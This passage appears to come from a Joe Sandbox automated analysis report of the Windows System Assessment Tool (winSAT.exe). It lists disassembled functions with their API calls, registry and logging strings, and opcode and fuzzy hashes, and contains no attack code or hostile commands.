                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandleHandlerLastLibraryMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2
                                                                                                                                                                                              • API String ID: 3961399675-3112339584
                                                                                                                                                                                              • Opcode ID: 059f1fa61d7c03d0ed93bba0af989d83c1fa4d10aff957910cc3908521c3c790
                                                                                                                                                                                              • Instruction ID: f38248a14245ee041f926c1f2440001e75d7f290dae0ec72cc58d3fb51cd3373
                                                                                                                                                                                              • Opcode Fuzzy Hash: 059f1fa61d7c03d0ed93bba0af989d83c1fa4d10aff957910cc3908521c3c790
                                                                                                                                                                                              • Instruction Fuzzy Hash: CB616E61E0D64295FB60BB11F8502BAEB50BF85748FF89035D94E027E1DEADF454CB60
                                                                                                                                                                                              Function 00007FF780F9F2A3 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 137synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandleHandlerLastLibraryMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2
                                                                                                                                                                                              • API String ID: 3961399675-3112339584
                                                                                                                                                                                              • Opcode ID: f1742e51f5db6adc76085ef93e44f7734c710560343e0148a6d74f9c8aca2e59
                                                                                                                                                                                              • Instruction ID: d89aca3e01a4d1491ce01bb7fa0b70f931479431272081dfd42e0cf2e9a720a5
                                                                                                                                                                                              • Opcode Fuzzy Hash: f1742e51f5db6adc76085ef93e44f7734c710560343e0148a6d74f9c8aca2e59
                                                                                                                                                                                              • Instruction Fuzzy Hash: DD615C60E0D64295FB60BB11F85027AEB50BF85788FF8A035D94E027E6DEADB454C760
                                                                                                                                                                                              Function 00007FF780F9F2BD Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 137synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandleHandlerLastLibraryMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2
                                                                                                                                                                                              • API String ID: 3961399675-3112339584
                                                                                                                                                                                              • Opcode ID: a7fc94cc773d67b40326d0184d642366cb8198f9fd3829a4c2515f669bac123f
                                                                                                                                                                                              • Instruction ID: e5e51cefdbe8e04f1bdbd0fa8ca044b02d4167ae315024ef8138c2ff629fdc02
                                                                                                                                                                                              • Opcode Fuzzy Hash: a7fc94cc773d67b40326d0184d642366cb8198f9fd3829a4c2515f669bac123f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F615E60E0D68395FB60BB11F8502BAEB50BF85788FF8A035D94D027E2CEADB454C760
                                                                                                                                                                                              Function 00007FF780F9F2D8 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 135synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionHandleOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandlerLastLibraryModuleMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2
                                                                                                                                                                                              • API String ID: 868517761-3112339584
                                                                                                                                                                                              • Opcode ID: 48ad5222af03a571fb0f27b28f8fd9c0169d08c4d24b81406f3283c97153d280
                                                                                                                                                                                              • Instruction ID: 98130016f36b84e9d86e6c6361562e3128ec603394b5d55481ecae180f0cdb9c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 48ad5222af03a571fb0f27b28f8fd9c0169d08c4d24b81406f3283c97153d280
                                                                                                                                                                                              • Instruction Fuzzy Hash: DD616D60E0D64395FB60BB11F8502BAEB50BF85788FF8A035D54E027E2DEADB454C761
                                                                                                                                                                                              Function 00007FF780F9F84D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 135synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandleHandlerLastLibraryMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2
                                                                                                                                                                                              • API String ID: 3961399675-3112339584
                                                                                                                                                                                              • Opcode ID: 782be181f8592520a654ec4ba99b35b2eb9fff8b28a7ab140bcd35295ad2ad23
                                                                                                                                                                                              • Instruction ID: 7473f9bc0b22af5bbca3dde12fe0ebae60bed0902aaf184f192a918c41fb1539
                                                                                                                                                                                              • Opcode Fuzzy Hash: 782be181f8592520a654ec4ba99b35b2eb9fff8b28a7ab140bcd35295ad2ad23
                                                                                                                                                                                              • Instruction Fuzzy Hash: 15616D60E0D64295FB60BB11F85027AEB50BF85788FF8A035D94E027E1CEADB454CB60
                                                                                                                                                                                              Function 00007FF780FCD580 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 93librarywindowCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Library$FormatFreeLoadMessageStringType
                                                                                                                                                                                              • String ID: H$INFO: cannot find message for Win32 error %u$Wininet.dll$base\winsat\exe\logging.cpp$netmsg.dll
                                                                                                                                                                                              • API String ID: 270474373-3627440521
                                                                                                                                                                                              • Opcode ID: 69f183a88fc5718d08238e4e637c98c5982bd811d2ed09e00ccbf1a21da30ccc
                                                                                                                                                                                              • Instruction ID: c4de3a1a1370e323505dcb629fde39002fe63d86e8658a35f8e5c507d1549c0b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 69f183a88fc5718d08238e4e637c98c5982bd811d2ed09e00ccbf1a21da30ccc
                                                                                                                                                                                              • Instruction Fuzzy Hash: EF317E2260C69183E760AF11E8043BEFA91FB84BA4FA58635CA8D477D4DF7CE545C710
                                                                                                                                                                                              Function 00007FF780FD7258 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 87registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32 ref: 00007FF780FD72A7
                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000030,00007FF780FA03B3), ref: 00007FF780FD72EB
                                                                                                                                                                                                • Part of subcall function 00007FF780FA96E0: LoadLibraryExA.KERNEL32 ref: 00007FF780FA9740
                                                                                                                                                                                                • Part of subcall function 00007FF780FA96E0: FormatMessageA.KERNEL32(?,?,?,?,?,?,?,00007FF780F9A505), ref: 00007FF780FA9786
                                                                                                                                                                                                • Part of subcall function 00007FF780FA96E0: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00007FF780F9A505), ref: 00007FF780FA97FA
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE41F
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetCurrentProcessId.KERNEL32 ref: 00007FF780FCE440
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetTickCount.KERNEL32 ref: 00007FF780FCE459
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _snprintf_s.MSVCRT ref: 00007FF780FCE48C
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _vsnprintf_s.MSVCRT ref: 00007FF780FCE4DB
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE500
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000030,00007FF780FA03B3), ref: 00007FF780FD73A0
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EnabledEventLibrary$CloseCountCurrentFormatFreeLoadMessageOpenProcessQueryTickValue_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSATAPI$TaskErrorCount$The error count is zero becuase the TaskErrorCount value does not exist.$base\winsat\common\winsatutilities.cpp$cannot access the winast API registry key; %u %s$cannot access the winast TaskErrorCount API registry value; %u %s
                                                                                                                                                                                              • API String ID: 4085292852-3670254411
                                                                                                                                                                                              • Opcode ID: f36afb1bc73f1c02f9be7f336770e1f64464e0b4a6580bb76c84017912defc67
                                                                                                                                                                                              • Instruction ID: f187ace5dedb7a088727e5b50639a492680a83e5ae90e9b61a235ad92eccc2a8
                                                                                                                                                                                              • Opcode Fuzzy Hash: f36afb1bc73f1c02f9be7f336770e1f64464e0b4a6580bb76c84017912defc67
                                                                                                                                                                                              • Instruction Fuzzy Hash: F541833571CB8292E750AB51E8841AAF7A4FB98750FE09231EE8D03B94EF7CE505CB10
                                                                                                                                                                                              Function 00007FF780FA3F38 Relevance: 15.2, APIs: 10, Instructions: 206sleepCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharErrorLastMultiWide$Sleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3672326914-0
                                                                                                                                                                                              • Opcode ID: 82c48a35b7920db008f950404d87549f172c379e0a5da5641d99b65fd0b0a73f
                                                                                                                                                                                              • Instruction ID: 00942e520fff7900e7a68861eabbb309eb771937a3e68805ce425ad08bfeb392
                                                                                                                                                                                              • Opcode Fuzzy Hash: 82c48a35b7920db008f950404d87549f172c379e0a5da5641d99b65fd0b0a73f
                                                                                                                                                                                              • Instruction Fuzzy Hash: C7918E37A08B8596EB699F16E9402ADB7A0FB89B94FA49131DB4D43794CF38F470C710
                                                                                                                                                                                              Function 00007FF780F9BA85 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 144COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: StringType$memcpy
                                                                                                                                                                                              • String ID: A failure occured while resetting history.$A failure occured while resetting write history.$HistoryVersionWrite$Machine already has a WinEI rating. Rerunning all assessments ...$Machine already has a WinEI rating. Rerunning all assessments ... $base\winsat\exe\main.cpp$clean$never$restart
                                                                                                                                                                                              • API String ID: 240754450-2095427325
                                                                                                                                                                                              • Opcode ID: fadbc2bcc4c2da98e617a4a017fa33523133907ef1e72d946003ab26a1aed016
                                                                                                                                                                                              • Instruction ID: 1a55987824c981b5507ae1fb159139e608d61b132ff994b24d422a052630f983
                                                                                                                                                                                              • Opcode Fuzzy Hash: fadbc2bcc4c2da98e617a4a017fa33523133907ef1e72d946003ab26a1aed016
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A514B61A1C64391FF44FB11E8512B9A760BF90354FE09036E94E866EAEF6CF54AC720
                                                                                                                                                                                              Function 00007FF780F942E1 Relevance: 15.1, APIs: 10, Instructions: 112threadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CurrentPriority$Thread$ClassProcess$ErrorLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2414731974-0
                                                                                                                                                                                              • Opcode ID: d215e296768f0f995cad51675aab21ab80491c043c38e87d3093ebc4311003cb
                                                                                                                                                                                              • Instruction ID: fd715932eaef7310488c84332e4997920375cdbd2ea399cfb99d65d87b8a0fab
                                                                                                                                                                                              • Opcode Fuzzy Hash: d215e296768f0f995cad51675aab21ab80491c043c38e87d3093ebc4311003cb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C515E26A0D68286EB50FB15A4147BAAB60FB99B55FE19031CA4E43396DF3CE044C720
                                                                                                                                                                                              Function 00007FF780F9A290 Relevance: 15.1, APIs: 12, Instructions: 76COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 432778473-0
                                                                                                                                                                                              • Opcode ID: 331848b3bd0de52c86ec592844e83ba236a2727f74907b6da448dc7a704e7d0e
                                                                                                                                                                                              • Instruction ID: 035cdc94d338b8f73cfe2f21b994b3531f9f867af89468abe6be547fef28ee6d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 331848b3bd0de52c86ec592844e83ba236a2727f74907b6da448dc7a704e7d0e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D3157B7E0960B96EB04FB65E8602E8B771BB50304FB05036D74D16869DFB8D659CB20
                                                                                                                                                                                              Function 00007FF780FA63C4 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 382stringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memchr$localeconvstrcspn
                                                                                                                                                                                              • String ID: 0$e
                                                                                                                                                                                              • API String ID: 2307473258-387598579
                                                                                                                                                                                              • Opcode ID: d14ec9f4b551829755efa5cefbf0e45d3571546032b5396c7b5f939dd332a3e4
                                                                                                                                                                                              • Instruction ID: ce0a1bc926a2e10e5fb42f151fe4372e2150f3ad4c6c4d14d9a5118dce0759d8
                                                                                                                                                                                              • Opcode Fuzzy Hash: d14ec9f4b551829755efa5cefbf0e45d3571546032b5396c7b5f939dd332a3e4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8602B123A1CB8585EB009F65E8401EDB771FB88B98FA49221EE8D17B99DF7CE145C710
                                                                                                                                                                                              Function 00007FF780FAF508 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 195COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetStringTypeExW.KERNEL32(?,?,00000001,00000000,?,00000035,?,?,?,00007FF780FAF23E,?,?,?,00000000,?,00007FF780FAD257), ref: 00007FF780FAF54E
                                                                                                                                                                                              • GetStringTypeExW.KERNEL32(?,?,00000001,00000000,?,00000035,?,?,?,00007FF780FAF23E,?,?,?,00000000,?,00007FF780FAD257), ref: 00007FF780FAF5B3
                                                                                                                                                                                              • GetStringTypeExW.KERNEL32(?,?,00000001,00000000,?,00000035,?,?,?,00007FF780FAF23E,?,?,?,00000000,?,00007FF780FAD257), ref: 00007FF780FAF603
                                                                                                                                                                                              • GetStringTypeExW.KERNEL32(?,?,00000001,00000000,?,00000035,?,?,?,00007FF780FAF23E,?,?,?,00000000,?,00007FF780FAD257), ref: 00007FF780FAF6A5
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: StringType
                                                                                                                                                                                              • String ID: -$/
                                                                                                                                                                                              • API String ID: 4177115715-2515390558
                                                                                                                                                                                              • Opcode ID: 33adc80c373c8fabc2fb4c00fcf77494f6f1e79ff85901a121ff28b11398290f
                                                                                                                                                                                              • Instruction ID: efe198225ea14f1ae41b787ad07c5724edf680f094cc908c022e9acb24f17511
                                                                                                                                                                                              • Opcode Fuzzy Hash: 33adc80c373c8fabc2fb4c00fcf77494f6f1e79ff85901a121ff28b11398290f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 27715226A0864187EB709F66D4003F9A6A0FB4879CFA89031DE4D9B7D4DF3DE499C760
                                                                                                                                                                                              Function 00007FF780FF0B48 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00007FF780FEDC64: _aligned_malloc.MSVCRT ref: 00007FF780FEDCA5
                                                                                                                                                                                                • Part of subcall function 00007FF780FEDC64: InitializeSListHead.KERNEL32 ref: 00007FF780FEDCBD
                                                                                                                                                                                                • Part of subcall function 00007FF780FEDC64: CreateEventW.KERNEL32 ref: 00007FF780FEDD00
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32 ref: 00007FF780FF0CC5
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32 ref: 00007FF780FF0D01
                                                                                                                                                                                                • Part of subcall function 00007FF780FE0840: GetLastError.KERNEL32(?,?,?,00007FF780FF0D7D), ref: 00007FF780FE0872
                                                                                                                                                                                                • Part of subcall function 00007FF780FE0840: RegCloseKey.ADVAPI32(?,?,?,00007FF780FF0D7D), ref: 00007FF780FE0891
                                                                                                                                                                                                • Part of subcall function 00007FF780FE0840: SetLastError.KERNEL32(?,?,?,00007FF780FF0D7D), ref: 00007FF780FE08A4
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE41F
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetCurrentProcessId.KERNEL32 ref: 00007FF780FCE440
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetTickCount.KERNEL32 ref: 00007FF780FCE459
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _snprintf_s.MSVCRT ref: 00007FF780FCE48C
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _vsnprintf_s.MSVCRT ref: 00007FF780FCE4DB
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE500
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
